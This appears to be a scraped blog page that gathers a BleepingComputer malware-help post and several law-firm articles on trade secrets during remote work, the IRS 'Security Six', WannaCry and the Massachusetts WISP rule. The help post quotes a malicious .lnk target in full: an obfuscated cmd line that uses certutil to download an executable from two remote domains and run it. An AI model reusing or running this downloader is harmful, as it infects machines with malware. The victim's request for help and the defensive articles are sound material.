Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Protect Trade Secrets While Employees Work From Home? - The National Law Review

Protect Trade Secrets While Employees Work From Home? - The National Law Review


Protect Trade Secrets While Employees Work From Home? - The National Law Review

Posted: 25 Mar 2020 12:00 AM PDT

In response to the COVID-19 outbreak, many businesses (particularly those in states or cities under "stay home" orders) have implemented a work-from-home ("WFH") directive for employees.  It is important for businesses to address the security of their trade secrets in this new environment in order to reduce the risk of misappropriation.  It is also important to reduce the risk that the trade secret status of information will be lost based on a failure to take reasonable steps to protect its secrecy.  This article addresses some steps your business can consider taking to protect trade secrets accessible by employees who are now working at home.  Even if your business had a WFH policy before the COVID-19 outbreak, it should be re-visited in light of the current circumstances flowing from a pandemic during which all or most of your workforce may be operating on a WFH basis.  For example, what was once a "no trade secrets may be taken home" policy may be impossible in the current climate.

The following are a few potential steps for consideration to protect trade secrets in the hands of employees working at home:

  • Repeatedly remind your workers that it is their responsibility to ensure that confidential information remains confidential while in their home worksites and that they should be constantly watching for potential vulnerabilities.

  • Reiterate to employees that they are prohibited from transmitting or maintaining company confidential information except as authorized by the company and that includes personal email accounts, cloud accounts, social media, etc.

  • Require your WFH workers to keep their homes locked to the extent that your confidential information is maintained there. Also tell them that, ideally, they should do their work in a room to which only they have access.  If that is not possible, they need to be vigilant in not inadvertently giving others access to your confidential information (e.g., keep a "clean desk" to prevent others in their homes from viewing company trade secrets; be mindful not to have conference calls or video-chats about confidential information in the presence of others in their homes).   This is true even if they think those others do not present a realistic risk of misappropriation (e.g., a friend or family member).  Make your employees understand that, in addition to avoiding misappropriation, taking reasonable steps to protect secrecy is also critical since the company will not be able to protect information as a trade secret if it loses its trade secret status.

  • If you anticipate your workers will verbally discuss confidential matters at their home office, request that home assistant devices (such as Google Home and Alexa) be turned off and out of earshot from the worker's home office or workspace. These devices are constantly listening to their environment.

  • Prohibit workers from printing documents as much as reasonably practical while they work from home. To the extent that hard copy confidential materials are needed, tell your WFH workforce not to discard them in their ordinary trash and require them to retain all confidential documents in secure (locked) locations at their homes so they may be securely disposed of once your workforce returns to the office.

  • If reasonably possible, direct your workforce to connect to your business's network as securely as possible, such as through a VPN. Consider requiring two-factor authentication for access to your business's VPN or remote network.

  • Remind your WFH workers to password-protect their home WiFi system and to work with your IT personnel so that communications including confidential information are encrypted. Consider software that requires an email recipient to possess a designated digital signature to review messages and open attachments.  This prevents the forwarding of trade secret information to email accounts beyond your business.

  • If possible, consider prohibiting your workers from transmitting trade secret information via email altogether. Instead, permit access to trade secret information via secured shared drives with access rights limited to a need-to-access basis.

  • Mandate that, with the assistance of your IT personnel, your WFH employees set their home computer screens to lock up after a set time period (e.g., 5 minutes) of non-use and require passwords to unlock the screens.

  • Educate your workers about malicious emails, SMS messages, and other communications designed to infiltrate your business's network.  Bad actors are taking advantage of the Coronavirus pandemic by sending emails and SMS messages regarding purported Coronavirus tips, maps, and other scare tactics to entice users to open malware.  Remind your workers to only open messages from trusted sources and require your workers to report suspicious messages to your IT team. Admonish employees that if they open malware or a virus or have been hacked, they should contact your IT team immediately so that your business can attempt to do damage control as soon as is possible.

  • If reasonably practical, limit trade secret materials to be used at home to those needed for current projects.

  • Develop a system to account for all confidential information maintained at your workers' homes and, if appropriate for your business, create a check-out/check-in process for your workers to return such documents.

  • If possible, implement a system that notifies your IT department whenever an employee downloads, copies, prints, or deletes a significant amount of data from your business's network. The activity may turn out to be legitimate, but it should be investigated.

  • If reasonably practical, implement remote lock-out and wipe capabilities. These procedures permit your IT department to immediately lock an employee out of your network if the employee compromises your confidential information and to wipe all company data from a device if an employee misplaces a company device.  These procedures could also be used if an employee become incapacitated.

  • If possible, issue laptops to employees that have anti-virus/malware applications installed and that do not have USB ports to prevent unauthorized thumb drive downloads.

  • Give your employees a specific "go to" person at the company, should they have any questions or concerns about working at home with company confidential information.

Also, remember that the protection of your trade secrets goes beyond the regulation of your immediate workforce.  Consider asking outside vendors, suppliers, and outside professionals with access to your business's trade secrets what they are doing to protect your trade secrets during the COVID-19 pandemic if their personnel with access to your trade secrets are now working from home.  If you receive an unsatisfactory response, take appropriate action.

There is no one-size-fits-all approach to protecting trade secrets.  Instead, each business must assess what is "reasonable under the circumstances" to maintain the secrecy of its trade secrets.  What may be reasonable to one business may not be reasonable for another (e.g., given the difference in size, sophistication, and resources).  Thus, a business facing the current COVID-19 WFH environment should consult with its legal counsel to assess reasonable steps it should take to maintain the secrecy of its trade secrets during this unprecedented WFH period.

As you are aware, things are changing quickly and there is no clear-cut authority or bright line rules about what are reasonable steps to protect trade secrets in response to WFH during COVID-19.  This article is not an unequivocal statement of the law, but instead offers some potential reasonable steps for consideration.  This article does not address the potential impacts of the numerous other local, state and federal orders that have been issued in response to the COVID-19 pandemic, including, without limitation, potential liability should an employee become ill, requirements regarding family leave, sick pay and other issues.

Copyright © 2020, Sheppard Mullin Richter & Hampton LLP.

Critical Cybersecurity Safeguards Outlined By IRS - The National Law Review

Posted: 02 Oct 2018 12:00 AM PDT

Summary

The Internal Revenue Service and the Security Summit partners recently issued a news release outlining the "Security Six," a list of essential steps to protect stored employee information on networks and computers. Employee benefits professionals, including those who administer welfare and retirement plans for employees and beneficiaries, should review and implement the "Security Six" in order to protect sensitive data from cyberattacks.

In Depth

Background

In recent years, cybercriminals have exponentially increased cyberattacks and continuously invent new ways to commit data and identity theft. Benefit plan sponsors and plan administrators often share and store sensitive employee data in order to administer benefit plans. Plan sponsors and fiduciaries must consider the importance of strong cybersecurity measures in order to safeguard sensitive personal data. If not, cyberattacks could result in account takeovers, identity theft and data integrity breaches.

On July 17, 2018, the Internal Revenue Service, state tax agencies and the private-sector tax industry—known as the Security Summit partners—released the "Security Six." The "Security Six" are six basic safeguards designed to protect data that is stored on tax professionals' computers and networks.

Key Aspects of the "Security Six"

The "Security Six" encourages professionals to implement the following protective measures: 1) antivirus software, 2) firewalls, 3) two-factor authentication, 4) backup software and services, 5) drive encryption and 6) a written data security plan.

Antivirus Software

Antivirus software scans files and a computer's memory for specific patterns that may indicate the presence of malicious software, or malware. According to the US Computer Emergency Readiness Team, a division of the Department of Homeland Security, antivirus vendors discover new malware daily. This is why it is important for computer users to check regularly for the latest updates of antivirus programs.

Computer users should configure antivirus software to automatically scan specific files or directories in real time and create a prompt at set intervals for complete scans. If the antivirus software does not automatically scan new files, users should manually scan files and media received from an outside source before opening them. This process includes saving and scanning email attachments or web downloads rather than opening them directly from the source.

Firewalls

Firewalls protect against outside attackers by shielding the user's computer or network from malicious or unnecessary network traffic. The advantage of hardware-based firewalls is that they are separate devices running their own operating systems, so they offer an additional line of defense against attacks when compared to system or host-level protections. Most operating systems include a built-in firewall feature that should be enabled for added protection even if using a hardware-based firewall.

Firewalls primarily help protect against malicious traffic, not against malicious programs, and may not protect the device if the user accidentally installs malware. The Security Summit reminded tax professionals that anti-virus software and firewalls cannot protect data if computer users fall for email phishing scams and reveal sensitive data, such as usernames and passwords.

Two-Factor Authentication

Many email providers now offer customers two-factor authentication protections to access email accounts. Often two-factor authentication means the returning user must enter credentials, plus another step, such as entering a security code to complete the process. Professionals should always opt for multi-factor authentication protection when it is offered on an email account or any other password-protected product.

Backup Software and Services

Professionals should routinely back up critical files to external sources. This means a copy of the file is made and stored either online as part of a cloud storage service or a similar product. Important files can also be copied to an external disk, such as an external hard drive that has multiple terabytes of storage capacity.

Drive Encryption

Professionals should install drive encryption software for full-disk encryption. Drive encryption, or disk encryption, transforms data on the computer into unreadable files for the unauthorized person accessing the computer. Professionals can also use a drive encryption that is a stand-alone security product and encrypt removable media, such as a thumb drive and its data.

Written Data Security Plan

The Security Summit also reminded tax professionals of other important steps, such as developing a written data security plan as required by the Federal Trade Commission and its Safeguards Rule. Revised IRS Publication 4557 includes security recommendations and can assist with creating a data security plan, and IRS Publication 5293 compiles data security information.

Impact of IRS Guidance on Retirement and Welfare Plans

Employees typically provide retirement plan record-keepers and service providers with significant personal information, such as the social security number, address, birth date, bank account information, retirement date, compensation information and asset balances. Similarly, welfare plan administrators store personal information on employees and dependents, including age, income and health history. If a cybercriminal obtains this information from a plan administrator's computer or network, it can lead to identity theft for plan participants. Because of the important information maintained by retirement plans and welfare plans, they attract cybercriminals. Benefit plan sponsors and plan administrators should prudently follow the "Security Six" safeguards provided by the IRS and the Security Summit.

Conclusion

As cybercriminals continue to develop new methods to obtain sensitive personal data from the networks of professional offices, employee benefits professionals must be both proactive and reactive to new data security threats. It is crucial for employee benefits professionals to make sure they have implemented the "Security Six" safeguards. Installing strong firewalls, antivirus software, backup software, drive encryption, and developing a data security plan, will help protect the sensitive personal information stored on many professional office networks and computers.

We would also like to thank law clerk Charnae Supplee for contributing to this article.

WannaCry Ransomware Cyberattack Raises Legal Issues | The National Law Review - The National Law Review

Posted: 22 May 2017 12:00 AM PDT

The recent cyberattack highlights the need for firms to engage in proactive prevention and protection.

Ransomware (malware that encrypts data pending an extortion payment) is a recurring cyber threat that is growing more pervasive and profitable for criminals. The most recent attack this month by the WannaCry virus highlights the potential global impact, speed and acceleration, and scope of the ransomware problem.

Ransomware as one unique form of cyberattack has been an increasing global and domestic cybersecurity problem over the last several years. Ransomware targets have included businesses, hospitals, schools, and even police departments.[1] Worryingly, some recent forms of ransomware are becoming more sophisticated and resilient.

Because of the recurring nature of this type of cyberattack, in this article we offer some steps for proactive prevention and protection and some thoughts on the legal issues that may arise following these types of cyberattacks.

Background

Ransomware like WannaCry is designed to encrypt key data on a user's computer or network. The cyberattacker then demands that victims pay a ransom to have their data or files decrypted or restored.

In the case of WannaCry specifically, the software demands that the victim pay a ransom of $300 in bitcoins at the time of infection. If the user doesn't pay the ransom within three days, the amount doubles to $600. After seven days without payment, WannaCry is designed to delete all of the encrypted files and all data will be lost.

The WannaCry virus is designed to spread quickly among computer networks and exploits a vulnerability in computers operating Microsoft Windows without a certain security "patch" that Microsoft issued in March 2017. Recent estimates are that WannaCry quickly spread to more than 150 countries and has affected over 100,000 organizations.[2]

Initial Defense: What You Can Do

Cybersecurity starts with prevention and protection. Common steps a firm and its employees can take to thwart or mitigate ransomware include the following:

Offline and Secure Backups

Ransomware demands are premised on the need to recover and restore data that has been locked up. If offline and unaffected backups exist, the ransomware demands can be disregarded and are rendered irrelevant.

The backup can be either in the form of an external physical hard drive or with a secure cloud-computing service provider. With backups, the firm can erase the data from the infected computers and restore its system from the backups after a ransomware demand.

Avoiding Links or Phishing Schemes with Attachments Containing Malware

An initial line of cyber defense is to avoid the introduction of malware or ransomware onto a network or computer to begin with. This is where the human factor comes in. Many viruses and malware spread by tricking end users to download them via email based on phishing campaigns, spear phishing, or spam. The malware could be embedded in an attachment or at a link contained in an email.

One primary defensive step the firm can take is to train and encourage its employees to practice vigilance against key cyber risks. Cyber-aware employees will avoid clicking on links or downloading attachments from suspicious emails or sources.

Here are some ways to spot a "phishy" email:

  • Look at the email address of the sender and see if it looks legitimate.

  • Look for obvious typos and errors in the body of the email.

  • Hover over hyperlinks and read the name of the website to which they link before clicking.

  • Exercise common sense and good judgment when assessing the legitimacy of an email (i.e., are they asking you to reply with personal or financial information?).

Update Operating Systems, Software, and Patches and Use Antivirus Software

Another key step is ensuring that operating systems, security software, and patches are up to date for all systems and devices. Software makers frequently issue security updates for their products. These updates will often address and "patch up" security vulnerabilities.

Employees should also be reminded to regularly update the software on their mobile and other devices. While all software should be kept up to date, updated antivirus software is especially important.

Monitoring and Intrusion Detection

The firm can take steps to detect and block malware through monitoring and intrusion detection. Monitoring may include analyzing basic network traffic as well as looking for any anomalous activity on the firm's network. Firewalls and intrusion detection systems can help protect against and provide alerts about unauthorized access or potential cyber threats.

Tailored Protections

Effective cybersecurity requires a tailored and risk-based approach to safeguard information and systems. There is no one-size-fits-all approach.[3] Typically, a layered security approach can protect data depending on the cyber risks, system, and information. Firms can consider whether necessary protections are in place as part of its broader cybersecurity strategy.

Incident Response Plan That Is Tested

In the event of a cyberattack, the firm can deploy its incident response plan. This plan typically includes key points of contact and a tailored response strategy to ensure that the firm can quickly implement appropriate steps to recover.

In the event of a ransomware demand, a number of technical and legal issues may arise. A technical team can isolate the infected system, assess the scope of any damage, take steps to mitigate the cyberattack, and determine whether a decryption key may exist (low probability but worth considering). The firm can screen any backups to ensure that they are malware free. The technical team can work closely with counsel, as noted in the next section, to address legal issues at all phases including a decision about contacting law enforcement. A postincident review will be useful to highlight other security measures and steps to protect the organization.

Common Legal Issues

The facts of each cyber incident must be carefully considered against a host of potential legal issues. Experienced counsel can guide firms through these issues as well as the investigation and any legal process. We have seen a number of common legal issues that may arise during a ransomware or cyberattack. Issues to consider include the following:

Initial Cyber Investigation under Attorney-Client Privilege

Initially, the firm must carefully assess the nature of the attack and its scope. There are many initial considerations:

  • What networks, systems, or data were affected?

  • Is the cyber incident ongoing or has it been contained?

  • Has security been restored?

  • What, if any, data may have been exfiltrated?

  • Was any data "accessed" or "acquired" or reasonably believed to have been accessed or acquired?

The answers to these and other related questions will likely take some time to resolve. Because the answers will likely have legal consequences, it is highly recommended that any cyber investigation be conducted under attorney-client privilege. This will allow the firm to obtain frank and candid legal advice as the facts are emerging.

Determining Any Notification Requirements

Depending on the facts and nature of the data, the cyber incident may trigger a legal notification requirement. The notifications may be obligated under contractual requirements or statutes depending on the industry and jurisdiction of enforcers. Additionally, it is important to note that there may be different triggering standards for the notification requirement.

As an example, in the United States, 52 jurisdictions (including 48 states, the District of Columbia, Guam, Puerto Rico, and the Virgin Islands) have enacted some version of a data breach notification law.[4] Under these laws, notification may be required for any customer whose personally identifiable information (PII) was acquired or accessed, or reasonably likely to have been acquired or accessed. While most states require some form of notice to their residents depending on applicable legal standards, some states also require notification to public agencies, such as the state attorney general. Until a uniform federal standard is adopted, the nuances and variations among these statutes must be reviewed and evaluated.[5]

Response to Government Inquiries and Enforcement Actions

Regulators may seek information regarding a cyber incident. Federal and state agencies have increased their focus on whether firms have reasonable cybersecurity protections in place even where a firm is the victim of a cyberattack.

Experienced counsel can assist in responding to these inquiries and in devising a recommended strategy with which to respond. Government inquiries may be initiated by federal and state regulators. We are seeing cases involving concurrent jurisdiction of regulators that may result in simultaneous investigations.

Anticipating Potential Civil Litigation

The firm can consider what specific steps can be taken to avoid or mitigate potential civil actions, including private rights of action or class actions regarding a cyber incident. Many states allow for a private right of action to be filed in order to recover damages. On cybersecurity matters, there has been substantial activity involving class actions. Engaging experienced counsel early after the cyber incident may help the firm recognize potential litigation, and counsel can recommend steps to anticipate and mitigate costly legal actions.

Contacting Law Enforcement

Another important question involves whether and when to contact law enforcement. Federal authorities recommend that law enforcement be contacted when ransomware occurs.[6] The facts of each case must be carefully considered by the firm. Law enforcement will likely want to obtain relevant data about the cyber incident that is properly authenticated under chain of custody protocols. The investigation and prosecution of the incident by law enforcement may result in public information and proceedings. Experienced counsel can assist in answering questions about the criminal justice process and cyber prosecutions.

Information Sharing in the Private and Public Sectors

The sharing of cyber-threat information with others may present issues that require legal consideration. A number of industries (such as automotive, aviation, and financial services) have Information Sharing Analysis Centers (ISACs). The Cybersecurity Information Sharing Act of 2015 was enacted to establish new protections and foster information sharing by the private sector to the government to "share cyber threat indicators and defensive measures."[7] The circumstances of sharing information under this law should be carefully considered. Communications with competitors should also be evaluated to ensure antitrust protections are in place and to avoid further governmental scrutiny concerning the contact with competitors.[8]

Scope of Cyber-Insurance Coverage

While many firms have cyber insurance, whether it covers ransomware depends on the terms of the applicable policy. Experienced counsel can review and provide guidance on any coverage issues.

Conclusion

Cyberattacks such as ransomware are unfortunately becoming more pervasive. Firms can take a number of steps to prevent and protect themselves against this form of cyberattack.

When a cyber incident arises, experienced counsel can help identify issues that may arise, work closely with technical specialists, and make recommendations for how best to navigate the process. Most important to firms is the implementation of a strategy that minimizes business disruptions and permits a return to full business operations as soon as possible.


[1] See, e.g., Press Release, Computer Virus Affects Police Department Servers, Cockrell Hill Police Department (Jan. 25, 2017); see also Chris Francescani, Ransomware Hackers Blackmail U.S. Police Departments, NBC News (Apr. 26 2016); Jason Trahan, Cockrell Hill police lose years worth of evidence in ransom hacking, WFAA (Jan. 25, 2017).

[2] For more information on WannaCry, see generally US Department of Homeland Security/US Computer Emergency Readiness Team (US-CERT), Indicators Associated With WannaCry Ransomware, Alert (TA17-132A) (originally released May 12, 2017, last revised May 19, 2017); National Cybersecurity and Communications Integration Center, What Is WannaCry/WanaCrypt0r?.

[3] For example, the National Institute of Standards and Technology (NIST) Cybersecurity Framework 1.0 (Feb. 12, 2014) provides a useful flexible approach to assess and manage cybersecurity risk.

[4] For a listing of the data breach notification statutes, see National Conference of State Legislatures, Security Breach Notification Laws; see also LawFlash: New Mexico to Become 48th State to Enact Data Breach Notification Statute (Mar. 28, 2017).

[5] See, e.g., M. Krotoski, L. Wang, & J. Rosen, The Need to Repair the Complex, Cumbersome, Costly Data Breach Notification Maze, BNA's Privacy & Security Law Report, 15 PVLR 271 (Feb. 8, 2016).

[6] Ransomware: What It Is and What To Do About It (June 2016).

[7] 6 U.S.C. §§ 1501-1510; Pub. L. 114–113, div. N, title I, § 111, 129 Stat. 2956 (Dec. 18, 2015).

[8] See Department of Justice and Federal Trade Commission: Antitrust Policy Statement on Sharing of Cybersecurity Information (Apr. 10, 2014). 

Copyright © 2020 by Morgan, Lewis & Bockius LLP. All Rights Reserved.

Massachusetts Data Breach Notification Requires WISP - The National Law Review

Posted: 13 Apr 2019 12:00 AM PDT

Overview

Since 2010, Massachusetts has required organizations that collect personal data about Massachusetts residents to implement a comprehensive written information security program ("WISP") designed to avoid and respond to data security incidents.

Despite this requirement, many companies, particularly those not physically located in Massachusetts, have not done so. Historically, the absence of a WISP is something that went unnoticed, but that may no longer be the case due to a recent change in the Massachusetts breach notification law.

Specifically, Massachusetts has amended its data breach notification law to require organizations that experience a data security incident to notify the Massachusetts Attorney General and the Massachusetts Director of Consumer Affairs and Business Regulation whether the organization implemented a WISP. This new reporting requirement highlights both the legal and practical need to implement a WISP.

Change in the Law

Effective April 11, 2019, organizations that experience a data breach that exposes the personal information of Massachusetts residents will have new responsibilities under Massachusetts law. In addition to the preexisting requirements that organizations notify the Massachusetts Attorney General and the Massachusetts Director of Consumer Affairs and Business Regulation regarding the nature of the breach, the number of impacted Massachusetts residents, and the steps taken related to the incident, organizations must now also expressly state whether the organization implemented a WISP. Organizations must also state whether they have updated their WISP after the data incident. While this new requirement does not formally go into effect until April 11, 2019, the Office of Consumer Affairs and Business Regulation has already updated its notification form to ask whether the organization implemented a WISP.

Organizations must also continue to notify impacted Massachusetts residents of the data breach and must now notify the residents that there is no charge to institute a security freeze or credit freeze. If the breach disclosed the Social Security Number of Massachusetts residents, the organization must now provide a minimum of 18 months of credit monitoring services, or 42 months if the organization is a consumer reporting agency. Related to this requirement, the organization may not require Massachusetts residents to waive their right to file a lawsuit in exchange for the credit monitoring services.

What is a Written Information Security Program?

A WISP is designed to develop and document the systems and processes that protect the customer and employee personal information stored by an organization. Under Massachusetts law, a WISP must address certain areas, including:

1)      designating employees responsible for the security program;

2)      identifying and assessing security risks;

3)      developing policies for the storage, access, and transportation of personal information;

4)      imposing disciplinary measures for violations of the WISP;

5)      limiting access by terminated employees;

6)      overseeing the practices of third-party vendors;

7)      restricting physical access to records;

8)      monitoring and reviewing the scope and effectiveness of the WISP; and

9)      documenting steps taken in response to data security incidents.

A WISP must also establish certain computer system security standards when technically feasible, including:

1)      securing user credentials;

2)      restricting access to personal information on a need-to-know basis;

3)      encrypting the transmission and storage of personal information;

4)      monitoring of security systems;

5)      updating firewalls, security patches, anti-virus, and anti-malware software; and

6)      training employees on the proper use of the computer security systems.

The Takeaway

Written information security plans are required for those organizations that collect personal information from Massachusetts residents and Massachusetts is taking steps to ensure organizations comply with that requirement. Apart from this legal obligation, all organizations should strongly consider implementing and documenting their processes for protecting personal information and for responding to a data security incident. Proactively assessing and addressing information security risks will not only fulfill the organization's requirements under Massachusetts law, but will allow the organization to reduce its risk of a data security incident and be prepared to quickly respond in the event an incident does take place.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US